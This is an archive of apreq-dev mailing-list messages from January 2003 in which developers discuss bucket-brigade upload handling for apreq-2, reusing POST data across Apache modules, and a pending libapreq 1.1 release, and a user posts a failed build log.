Delivered-To: [email protected] Received: (qmail 12853 invoked by uid 500); 19 Jan 2003 23:52:16 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 12842 invoked from network); 19 Jan 2003 23:52:15 -0000 To: Stas Bekman <[email protected]> Cc: apreq list <[email protected]> Subject: Re: apreq-2 uploads as bucket brigades? References: <[email protected]> <[email protected]> From: Joe Schaefer <[email protected]> Date: 19 Jan 2003 18:58:42 -0500 In-Reply-To: Stas Bekman's message of "Mon, 20 Jan 2003 09:39:08 +1100" Message-ID: <[email protected]> Lines: 49 User-Agent: Gnus/5.0802 (Gnus v5.8.2) Emacs/20.5 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N Stas Bekman <[email protected]> writes: > Joe Schaefer wrote: > > I'd like to drop the req->upload linked list of temp files, > > and use bucket brigades in their place. I'd planning to > > use a common apreq_param_t struct which extends apreq_value_t > > like so: > > > > struct apreq_param_t { > > enum { ASCII, UTF_8, UTF_16, IS0_LATIN_1 } charset; > > char *language; > > apreq_table_t *info; /* mime headers */ > > > > apr_bucket_brigade *bb; /* represents file contents */ > > > > apreq_value_t v; > > }; > > > > > > The main advantage of this approach would be that we can use > > the full bucket api for managing the upload data. The brigade > > could use heap-allocated buckets for smaller uploads, and then > > switch over to mmapped or file buckets after a certain size. > > The bucket API makes this look pretty easy. > > And you can even write upload hook filters with that ;) > > I agree that using a polished bb API, will make apreq's code more > robust, and may be shorter? Right. Hopefully it'll make it easier to use apreq-2 within an asynchronous IO environment as well. By the way, is there a TIEHANDLE API for bucket brigades in modperl 2? The core issue I'm concerned about is: what happens when an apreq-2 application wants to read the whole brigade, i.e. my $fh = $upload->fh; print while <$fh>; ? The file-buckets within the brigade will start generating heap-buckets. It *must* be our job to manage those additional heap-buckets, not the application programmer's job. Perl's refcounts should work well for this, but that might mean we'd end up pushing the "FILE API" into the Perl glue and out of the apreq-2 core. -- Joe Schaefer From [email protected] Mon Jan 20 00:00:28 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 16361 invoked by uid 500); 20 Jan 2003 00:00:28 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 16350 invoked from network); 20 Jan 2003 00:00:28 -0000 Message-ID: <[email protected]> Date: Mon, 20 Jan 2003 11:01:17 +1100 From: Stas Bekman <[email protected]> Organization: Hope, Humanized User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.1) Gecko/20020826 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Joe Schaefer <[email protected]> Cc: apreq list <[email protected]> Subject: Re: apreq-2 uploads as bucket brigades? References: <[email protected]> <[email protected]> <[email protected]> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N Joe Schaefer wrote: > Stas Bekman <[email protected]> writes: > > >>Joe Schaefer wrote: >> >>>I'd like to drop the req->upload linked list of temp files, >>>and use bucket brigades in their place. I'd planning to >>>use a common apreq_param_t struct which extends apreq_value_t >>>like so: >>> >>>struct apreq_param_t { >>> enum { ASCII, UTF_8, UTF_16, IS0_LATIN_1 } charset; >>> char *language; >>> apreq_table_t *info; /* mime headers */ >>> >>> apr_bucket_brigade *bb; /* represents file contents */ >>> >>> apreq_value_t v; >>>}; >>> >>> >>>The main advantage of this approach would be that we can use >>>the full bucket api for managing the upload data. The brigade >>>could use heap-allocated buckets for smaller uploads, and then >>>switch over to mmapped or file buckets after a certain size. >>>The bucket API makes this look pretty easy. >> >>And you can even write upload hook filters with that ;) >> >>I agree that using a polished bb API, will make apreq's code more >>robust, and may be shorter? > > > Right. Hopefully it'll make it easier to use apreq-2 within an > asynchronous IO environment as well. > > By the way, is there a TIEHANDLE API for bucket brigades in modperl > 2? The core issue I'm concerned about is: what happens when an > apreq-2 application wants to read the whole brigade, i.e. > > my $fh = $upload->fh; > print while <$fh>; > > ? The file-buckets within the brigade will start generating > heap-buckets. It *must* be our job to manage those additional > heap-buckets, not the application programmer's job. Perl's > refcounts should work well for this, but that might mean we'd > end up pushing the "FILE API" into the Perl glue and out > of the apreq-2 core. Look at the streaming filters API: http://perl.apache.org/docs/2.0/user/handlers/filters.html#Stream_oriented_Output_Filter These can be adopted to work with upload objects as well. A complete TIEHANDLE is planned for filters (implemented only partially), and should be easy to re-use for file uploads as well. __________________________________________________________________ Stas Bekman JAm_pH ------> Just Another mod_perl Hacker http://stason.org/ mod_perl Guide ---> http://perl.apache.org mailto:[email protected] http://use.perl.org http://apacheweek.com http://modperlbook.org http://apache.org http://ticketmaster.com From [email protected] Mon Jan 20 05:53:51 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 30170 invoked by uid 500); 20 Jan 2003 05:53:51 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 30153 invoked from network); 20 Jan 2003 05:53:50 -0000 To: Joe Schaefer <[email protected]> Cc: "Issac Goldstand" <[email protected]>, "apreq list" <[email protected]> Subject: Re: apreq-2 uploads as bucket brigades? References: <[email protected]> <047b01c2bfe4$795f4290$3f0aa8c0@fmenc001dev> <[email protected]> From: [email protected] (David N. Welton) Date: 19 Jan 2003 21:54:06 -0800 Message-ID: <[email protected]> Lines: 24 User-Agent: Gnus/5.09 (Gnus v5.9.0) Emacs/21.2 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N Joe Schaefer <[email protected]> writes: > Performance is one reason. If we don't *need* apreq to use the OS's > filesystem for spooling, we shouldn't. We can leave that up to the > application, but we could make it easy for them to pretend uploads > are always files by providing things like > apreq_upload_link(apreq_upload_t *upload) > apreq_upload_seek(apreq_upload_t *upload) > instead of just handing them a *FILE pointer to play with. Forgive me if I haven't been following as closely as I should, but would it still be possible to get ahold of a FILE* somehow? FILE*'s can be passed to Tcl to create new file handles, and this is something that I feel is useful, because it gives you a really simple API for dealing with smaller files, even if it's not terribly efficient. -- David N. Welton Consulting: http://www.dedasys.com/ Personal: http://www.dedasys.com/davidw/ Free Software: http://www.dedasys.com/freesoftware/ Apache Tcl: http://tcl.apache.org/ From [email protected] Tue Jan 21 05:12:19 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 36455 invoked by uid 500); 21 Jan 2003 05:12:19 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 36444 invoked from network); 21 Jan 2003 05:12:18 -0000 Message-ID: <[email protected]> Date: Tue, 21 Jan 2003 16:11:07 +1100 From: Stas Bekman <[email protected]> Organization: Hope, Humanized User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.1) Gecko/20020826 X-Accept-Language: en-us, en MIME-Version: 1.0 To: [email protected] Subject: FYI: Reply-To: header for the cvs commits mailing list Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-Spam-Rating: 161.129.204.104.available.above.net 1.6.2 0/1000/N FYI: I've asked Brian to add a Reply-To: header for cvs commit emails, to point to the dev list. (I was tired of fixing it manually) __________________________________________________________________ Stas Bekman JAm_pH ------> Just Another mod_perl Hacker http://stason.org/ mod_perl Guide ---> http://perl.apache.org mailto:[email protected] http://use.perl.org http://apacheweek.com http://modperlbook.org http://apache.org http://ticketmaster.com From [email protected] Wed Jan 22 00:00:14 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 39032 invoked by uid 500); 22 Jan 2003 00:00:13 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 39019 invoked from network); 22 Jan 2003 00:00:13 -0000 To: "apreq list" <[email protected]> Subject: Re: apreq-2 uploads as bucket brigades? References: <[email protected]> <047b01c2bfe4$795f4290$3f0aa8c0@fmenc001dev> <[email protected]> <[email protected]> From: Joe Schaefer <[email protected]> Date: 21 Jan 2003 19:06:42 -0500 In-Reply-To: [email protected]'s message of "19 Jan 2003 21:54:06 -0800" Message-ID: <[email protected]> Lines: 50 User-Agent: Gnus/5.0802 (Gnus v5.8.2) Emacs/20.5 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Spam-Rating: 161.129.204.104.available.above.net 1.6.2 0/1000/N [email protected] (David N. Welton) writes: > Joe Schaefer <[email protected]> writes: > > > Performance is one reason. If we don't *need* apreq to use the OS's > > filesystem for spooling, we shouldn't. We can leave that up to the > > application, but we could make it easy for them to pretend uploads > > are always files by providing things like > > > apreq_upload_link(apreq_upload_t *upload) > > apreq_upload_seek(apreq_upload_t *upload) > > > instead of just handing them a *FILE pointer to play with. > > Forgive me if I haven't been following as closely as I should, but > would it still be possible to get ahold of a FILE* somehow? I think so. But I'd like to have the *FILE API to be lazy. In other words, apreq shouldn't generate a *FILE internally unless 1) the upload is too large to store in memory, or 2) an apreq user (not a "hook author") wants to deal with the upload data via FILE*, in which case apreq can generate the FILE* handle if it hasn't already done so. What I'm looking for is an internal brigade design that manages such behavior, which is why I suggested using a meta bucket. It would be really cool (hint) if someone took a crack at this while I'm working on the rest of apreq-2's core. On a related note, the header docs for apreq_tables.h and apreq_cookie.h are stable in the current httpd-apreq-2 cvs, but certainly not complete. People looking for things to do might want to have a look at fixing those, or contributing a documentation system (any favorites?), or writing unit tests for tables and cookies. I expect to have a working core library within the next week, as well as one stand-alone environment available for testing. > FILE*'s can be passed to Tcl to create new file handles, and this is > something that I feel is useful, because it gives you a really simple > API for dealing with smaller files, even if it's not terribly > efficient. It is useful, natural, and convenient. I'd just like to avoid making it mandatory like we did with apreq-1. XForms will present a new set of needs for our mfd parser, and the extra flexibility of brigades over a vanilla FILE* pointer could be a really big winner there. -- Joe Schaefer From [email protected] Wed Jan 22 00:29:37 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 57440 invoked by uid 500); 22 Jan 2003 00:29:36 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 57426 invoked from network); 22 Jan 2003 00:29:36 -0000 Message-ID: <[email protected]> Date: Wed, 22 Jan 2003 11:24:08 +1100 From: Stas Bekman <[email protected]> Organization: Hope, Humanized User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.1) Gecko/20020826 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Joe Schaefer <[email protected]> Cc: apreq list <[email protected]> Subject: Re: apreq-2 uploads as bucket brigades? References: <[email protected]> <047b01c2bfe4$795f4290$3f0aa8c0@fmenc001dev> <[email protected]> <[email protected]> <[email protected]> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-Spam-Rating: 161.129.204.104.available.above.net 1.6.2 0/1000/N Joe Schaefer wrote: >>FILE*'s can be passed to Tcl to create new file handles, and this is >>something that I feel is useful, because it gives you a really simple >>API for dealing with smaller files, even if it's not terribly >>efficient. > > > It is useful, natural, and convenient. I'd just like to avoid making > it mandatory like we did with apreq-1. XForms will present a new set > of needs for our mfd parser, and the extra flexibility of brigades over > a vanilla FILE* pointer could be a really big winner there. Though it's not crossplatform. That's why apr is using apr_file_t and provides the method to extract the native implementation (FILE/HANDLE/...). I believe we should be using apr_file_t and not FILE*. __________________________________________________________________ Stas Bekman JAm_pH ------> Just Another mod_perl Hacker http://stason.org/ mod_perl Guide ---> http://perl.apache.org mailto:[email protected] http://use.perl.org http://apacheweek.com http://modperlbook.org http://apache.org http://ticketmaster.com From [email protected] Wed Jan 22 00:37:08 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 63380 invoked by uid 500); 22 Jan 2003 00:37:08 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 63369 invoked from network); 22 Jan 2003 00:37:08 -0000 To: apreq list <[email protected]> Subject: Re: apreq-2 uploads as bucket brigades? References: <[email protected]> <047b01c2bfe4$795f4290$3f0aa8c0@fmenc001dev> <[email protected]> <[email protected]> <[email protected]> <[email protected]> From: [email protected] (David N. Welton) Date: 21 Jan 2003 16:37:22 -0800 In-Reply-To: <[email protected]> Message-ID: <[email protected]> Lines: 29 User-Agent: Gnus/5.09 (Gnus v5.9.0) Emacs/21.2 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Spam-Rating: 161.129.204.104.available.above.net 1.6.2 0/1000/N Stas Bekman <[email protected]> writes: > Joe Schaefer wrote: > >>FILE*'s can be passed to Tcl to create new file handles, and this > >>is something that I feel is useful, because it gives you a really > >>simple API for dealing with smaller files, even if it's not > >>terribly efficient. > > It is useful, natural, and convenient. I'd just like to avoid > > making it mandatory like we did with apreq-1. XForms will present > > a new set of needs for our mfd parser, and the extra flexibility > > of brigades over a vanilla FILE* pointer could be a really big > > winner there. > Though it's not crossplatform. That's why apr is using apr_file_t > and provides the method to extract the native implementation > (FILE/HANDLE/...). I believe we should be using apr_file_t and not > FILE*. +1 to that. Tcl uses the same thing (the native implementation), I and it would be better to have a HANDLE instead of a FILE on windows. -- David N. Welton Consulting: http://www.dedasys.com/ Personal: http://www.dedasys.com/davidw/ Free Software: http://www.dedasys.com/freesoftware/ Apache Tcl: http://tcl.apache.org/ From [email protected] Wed Jan 22 01:08:06 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 89228 invoked by uid 500); 22 Jan 2003 01:08:05 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 89217 invoked from network); 22 Jan 2003 01:08:05 -0000 Errors-To: <[email protected]> Message-Id: <[email protected]> X-Sender: [email protected] X-Mailer: QUALCOMM Windows Eudora Version 161.129.204.104 Date: Tue, 21 Jan 2003 19:01:24 -0600 To: Stas Bekman <[email protected]> From: "William A. Rowe, Jr." <[email protected]> Subject: Re: apreq-2 uploads as bucket brigades? Cc: Joe Schaefer <[email protected]>, apreq list <[email protected]> In-Reply-To: <[email protected]> References: <[email protected]> <047b01c2bfe4$795f4290$3f0aa8c0@fmenc001dev> <[email protected]> <[email protected]> <[email protected]> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" X-Spam-Rating: 161.129.204.104.available.above.net 1.6.2 0/1000/N At 06:24 PM 1/21/2003, Stas Bekman wrote: >Joe Schaefer wrote: > >>>FILE*'s can be passed to Tcl to create new file handles, and this is >>>something that I feel is useful, because it gives you a really simple >>>API for dealing with smaller files, even if it's not terribly >>>efficient. >> >>It is useful, natural, and convenient. I'd just like to avoid making it mandatory like we did with apreq-1. XForms will present a new set of needs for our mfd parser, and the extra flexibility of brigades over >>a vanilla FILE* pointer could be a really big winner there. > >Though it's not crossplatform. That's why apr is using apr_file_t and provides the method to extract the native implementation (FILE/HANDLE/...). I believe we should be using apr_file_t and not FILE*. I would agree (as an apr hack.) Can I suggest you also consider the benefit of a custom bucket type? It might be possible to support the seek/read/write model against the set-aside file while still supporting the brigade read. This *could* be a very happy compromise. I can't go into it tonight (trying to get the Win9X users on 2.0.44 unbroken) but I'd be happy to share some more thoughts on this later in the week. Bill From [email protected] Thu Jan 23 08:53:42 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 51825 invoked by uid 500); 23 Jan 2003 08:53:42 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 51814 invoked from network); 23 Jan 2003 08:53:42 -0000 Message-ID: <003001c2c2be$b81df120$0400a8c0@divya> From: "Divya Mandalam Seshadri" <[email protected]> To: <[email protected]> Subject: reading POST data Date: Thu, 23 Jan 2003 14:36:22 +0530 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_002D_01C2C2EC.CCF5B3C0" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 X-Spam-Rating: 161.129.204.104.available.above.net 1.6.2 0/1000/N This is a multi-part message in MIME format. ------=_NextPart_000_002D_01C2C2EC.CCF5B3C0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable I want to know how to read POST data from an apache module without = loosing the data for subsequent modules on Apache 2.0.x. Thanks, Divya. ------=_NextPart_000_002D_01C2C2EC.CCF5B3C0 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML><HEAD> <META http-equiv=3DContent-Type content=3D"text/html; = charset=3Diso-8859-1"> <META content=3D"MSHTML 6.00.2600.0" name=3DGENERATOR> <STYLE></STYLE> </HEAD> <BODY bgColor=3D#c0c0c0> <DIV><FONT face=3DArial size=3D2>I want to know how to read POST data = from an apache=20 module without loosing the data for subsequent modules on Apache=20 2.0.x.</FONT></DIV> <DIV><FONT face=3DArial size=3D2>Thanks,</FONT></DIV> <DIV><FONT face=3DArial size=3D2>Divya.</FONT></DIV></BODY></HTML> ------=_NextPart_000_002D_01C2C2EC.CCF5B3C0-- From [email protected] Thu Jan 23 09:02:18 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 57138 invoked by uid 500); 23 Jan 2003 09:02:17 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 57111 invoked from network); 23 Jan 2003 09:02:17 -0000 X-MimeOLE: Produced By Microsoft Exchange V6.0.5762.3 Content-Class: urn:content-classes:message MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Subject: WG: POST-data in multiple states of a request Date: Thu, 23 Jan 2003 10:00:59 +0100 Message-ID: <[email protected]> X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: POST-data in multiple states of a request Thread-Index: AcKmaHGeaaegjvu4Txq8MiLWFEHwVgAAUgEgBxTPUNA= From: "Pelikan Stephan" <[email protected]> To: "Divya Mandalam Seshadri" <[email protected]> Cc: <[email protected]> X-Spam-Rating: 161.129.204.104.available.above.net 1.6.2 0/1000/N > I want to know how to read POST data from an apache module without = loosing the data for subsequent modules on Apache 2.0.x. > Thanks, > Divya. I provided a solution for apache 1.3.x perhaps it works for 2.0.x too! stephan -----Urspr=FCngliche Nachricht----- Von: Pelikan Stephan=20 Gesendet: Mittwoch, 18. Dezember 2002 08:50 An: '[email protected]' Betreff: WG: POST-data in multiple states of a request Hi again, I'm sorry but I sent the HP-UX source which doesn't work for linux. The right version is: ApacheRequest *ApacheRequest_new(request_rec *r) { ApacheRequest *req=3D0; char tmp[50]; const char *ereq =3D ap_table_get(r->notes, "ApacheRequestAddress"); if ((ereq !=3D NULL) && ((sscanf(ereq, "%p", &req)) !=3D EOF)) = return req; req =3D (ApacheRequest *) ap_pcalloc(r->pool, = sizeof(ApacheRequest)); req->status =3D OK; req->parms =3D ap_make_table(r->pool, DEFAULT_TABLE_NELTS); req->upload =3D NULL; req->post_max =3D -1; req->disable_uploads =3D 0; req->upload_hook =3D NULL; req->hook_data =3D NULL; req->temp_dir =3D NULL; req->parsed =3D 0; req->r =3D r; sprintf(tmp, "%p", (void *) req); ap_table_set(r->notes, "ApacheRequestAddress", tmp); return req; } "sscanf" on HP-UX also handles NULL-pointers but on linux it doesn't. Sorry, Stephan -----Urspr=FCngliche Nachricht----- Von: Pelikan Stephan=20 Gesendet: Mittwoch, 18. Dezember 2002 08:38 An: [email protected] Betreff: POST-data in multiple states of a request Hi, I wrote several Apache-modules which use formular-field's data and use libapreq and Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bRequest to handle those data. This modules are concatinated in the same request during different request-phases. This works fine as long as I use the GET-method because the formular's data are store permanently in the request-record and can be extracted by every new generated object. Sometimes it is necessary to do a POST-request and you know what happens: The first object retrieves the data and all other modules get nothing. So I did a patch and I hope you may include it into the source: c/apache_request.c: ApacheRequest *ApacheRequest_new(request_rec *r) { ApacheRequest *req=3D0; char tmp[50]; const char *ereq =3D ap_table_get(r->notes, "ApacheRequestAddress"); if ((sscanf(ereq, "%p", &req)) !=3D EOF) return req; req =3D (ApacheRequest *) ap_pcalloc(r->pool, = sizeof(ApacheRequest)); req->status =3D OK; req->parms =3D ap_make_table(r->pool, DEFAULT_TABLE_NELTS); req->upload =3D NULL; req->post_max =3D -1; req->disable_uploads =3D 0; req->upload_hook =3D NULL; req->hook_data =3D NULL; req->temp_dir =3D NULL; req->parsed =3D 0; req->r =3D r; sprintf(tmp, "%p", (void *) req); ap_table_set(r->notes, "ApacheRequestAddress", tmp); return req; } My trick is to return always the same object by storing the object's address in the request's notes. If it is there it will be returned otherwise the object will be created. I hope this is not "too dirty", but it works really fine and it is well-proven for more than 1 year. What do you think about it? regards, Stephan From [email protected] Thu Jan 23 17:15:37 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 93284 invoked by uid 500); 23 Jan 2003 17:15:36 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 93268 invoked from network); 23 Jan 2003 17:15:36 -0000 Date: Thu, 23 Jan 2003 09:07:46 -0800 (PST) From: Nick Tonkin <[email protected]> X-Sender: [email protected] To: Divya Mandalam Seshadri <[email protected]> cc: [email protected] Subject: Re: reading POST data In-Reply-To: <003001c2c2be$b81df120$0400a8c0@divya> Message-ID: <[email protected]> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-Spam-Rating: 161.129.204.104.available.above.net 1.6.2 0/1000/N On Thu, 23 Jan 2003, Divya Mandalam Seshadri wrote: > I want to know how to read POST data from an apache module without loosing the data for subsequent modules on Apache 2.0.x. > Thanks, If you want to know how to read the data try 'perldoc CGI' If you want to know how to not lose the data, check out $r->pnotes - nick ~~~~~~~~~~~~~~~~~~~~ Nick Tonkin {|8^)> From [email protected] Thu Jan 23 19:25:51 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 82632 invoked by uid 500); 23 Jan 2003 19:25:50 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 82619 invoked from network); 23 Jan 2003 19:25:49 -0000 To: apreq list <[email protected]> Subject: Re: libapreq 1.1 References: <[email protected]> From: Joe Schaefer <[email protected]> Date: 23 Jan 2003 14:32:25 -0500 In-Reply-To: Joe Schaefer's message of "26 Oct 2002 14:02:08 -0400" Message-ID: <[email protected]> Lines: 26 User-Agent: Gnus/5.0802 (Gnus v5.8.2) Emacs/20.5 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Spam-Rating: 161.129.204.104.available.above.net 1.6.2 0/1000/N Joe Schaefer <[email protected]> writes on October 26, 2002: > I'd like to put together a 1.1 release in November that: > > a) includes full OS X support for both the perl & C API's > b) includes Doug's Request.xs upload patches for perl 5.8.0 > c) documents the problems with using '\0' bytes in > cookies and request params. > > I volunteer to package up release candidates again and > work with the OS X user community and see that (a) & (b) > are OK. Would anyone like to volunteer a doc patch for (c)? Something's got to change here. It should not take this long to put out a maintenance release. Version 1.0 of Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bRequest segfaults with the current version of perl (5.8.0), and libapreq-1.0 does not support OS [email protected]. Thanks to the *user* *community*, we have a 1.1 that fixes both problems. Please reward them by releasing 1.1, soon. Thanks. -- Joe Schaefer From [email protected] Thu Jan 23 22:52:01 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 19315 invoked by uid 500); 23 Jan 2003 22:52:00 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 19304 invoked from network); 23 Jan 2003 22:52:00 -0000 Message-ID: <[email protected]> Date: Fri, 24 Jan 2003 09:46:30 +1100 From: Stas Bekman <[email protected]> Organization: Hope, Humanized User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.1) Gecko/20020826 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Nick Tonkin <[email protected]> Cc: Divya Mandalam Seshadri <[email protected]>, [email protected] Subject: Re: reading POST data References: <[email protected]> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-Spam-Rating: 161.129.204.104.available.above.net 1.6.2 0/1000/N Nick Tonkin wrote: > On Thu, 23 Jan 2003, Divya Mandalam Seshadri wrote: > > >>I want to know how to read POST data from an apache module without loosing the data for subsequent modules on Apache 2.0.x. >>Thanks, > > > If you want to know how to read the data try 'perldoc CGI' > > If you want to know how to not lose the data, check out $r->pnotes Also here is something that might do the work for you. http://perl.apache.org/docs/1.0/guide/snippets.html#Reusing_Data_from_POST_request __________________________________________________________________ Stas Bekman JAm_pH ------> Just Another mod_perl Hacker http://stason.org/ mod_perl Guide ---> http://perl.apache.org mailto:[email protected] http://use.perl.org http://apacheweek.com http://modperlbook.org http://apache.org http://ticketmaster.com From [email protected] Fri Jan 24 02:06:44 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 52715 invoked by uid 500); 24 Jan 2003 02:06:44 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 52649 invoked from network); 24 Jan 2003 02:06:31 -0000 Content-Type: text/plain; charset="us-ascii" From: Andrew Lord <[email protected]> Reply-To: [email protected] To: [email protected] Subject: Problem making libapreq on Mandrake 9.0 Date: Fri, 24 Jan 2003 12:38:56 +1030 User-Agent: KMail/1.4.3 MIME-Version: 1.0 Content-Transfer-Encoding: 8bit Message-Id: <[email protected]> X-Spam-Rating: 161.129.204.104.available.above.net 1.6.2 0/1000/N Hi, I am having trouble making libapreq (from version 1.0 or 0.33). The platform is Linux (Mandrake 9.0) and a script of the printout is shown below. I would be grateful for any pointers as to the likely cause of the problem I'm experiencing. Kind regards, Andrew Lord ########### Shell output during installation attempt ####### Script started on Fri Jan 24 12:37:28 2003 [36l > ]0;[email protected]: /backup/_All_RPM's_&_.tar.gz/templatetoolkit/libapreq-1.0 [andrew@localhost libapreq-1.0]$ make perl Makefile.PL PREFIX=/home/httpd/thisISaTEST [andrew@localhost libapreq-1.0]$ make install [K [K perl Makefile.PL PREFIX=/home/httpd/thisISaTEST Writing Makefile for libapreq Warning: -L../blib/arch/auto/libapreq changed to -L/backup/_All_RPM's_&_.tar.gz/templatetoolkit/libapreq-1.0/Request/../blib/arch/auto/libapreq Writing Makefile for Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bRequest Warning: -L../blib/arch/auto/libapreq changed to -L/backup/_All_RPM's_&_.tar.gz/templatetoolkit/libapreq-1.0/Cookie/../blib/arch/auto/libapreq Writing Makefile for Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bCookie Writing Makefile for libapreq ]0;[email protected]: /backup/_All_RPM's_&_.tar.gz/templatetoolkit/libapreq-1.0 [andrew@localhost libapreq-1.0]$ make make[1]: Entering directory `/backup/_All_RPM's_&_.tar.gz/templatetoolkit/libapreq-1.0/c' gcc -c -D_REENTRANT -D_GNU_SOURCE -fno-strict-aliasing -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64 -I/usr/include/gdbm -O3 -fomit-frame-pointer -pipe -mcpu=pentiumpro -march=i586 -ffast-math -fno-strength-reduce -DVERSION=\"\" -DXS_VERSION=\"\" -fpic "-I/usr/lib/perl5/5.8.0/i386-linux-thread-multi/CORE" apache_request.c In file included from apache_request.c:59: apache_request.h:5:19: httpd.h: No such file or directory apache_request.h:6:25: http_config.h: No such file or directory 